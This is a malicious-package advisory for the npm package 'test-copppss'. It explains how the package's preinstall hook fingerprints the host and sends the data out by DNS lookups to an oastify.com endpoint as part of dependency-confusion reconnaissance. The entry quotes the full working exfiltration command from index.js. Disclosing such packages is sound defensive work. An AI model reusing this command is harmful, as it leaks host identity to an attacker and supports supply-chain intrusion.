MAL-2026-5926

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (03106e028cee7749b7f3a9b327142fc0a402574bc72f3a62d129aa891afe85fe) On `npm install`, the package's `preinstall` hook (`node index.js > /dev/null 2>&1`) runs a shell pipeline that collects host identifiers — `hostname`, `pwd`, `whoami`, the package name `test-copppss`, and the machine's public IP via `curl https://ifconfig.me` — hex-encodes the concatenation with `xxd -p`, and exfiltrates it as DNS subdomain lookups to `*.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com` (a Burp Collaborator OAST endpoint controlled by the operator). Code at index.js:2 is `exec("a=$(hostname;pwd;whoami;echo 'test-copppss';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com;done")`. The package metadata (empty description, near-max version `1.999.0` to win semver resolution, single trivial dependency, preinstall beacon) matches the canonical dependency-confusion / namespace-claim reconnaissance shape — the attacker is probing which internal build systems resolve `test-copppss` to this public name and is harvesting the host fingerprint of any environment that does.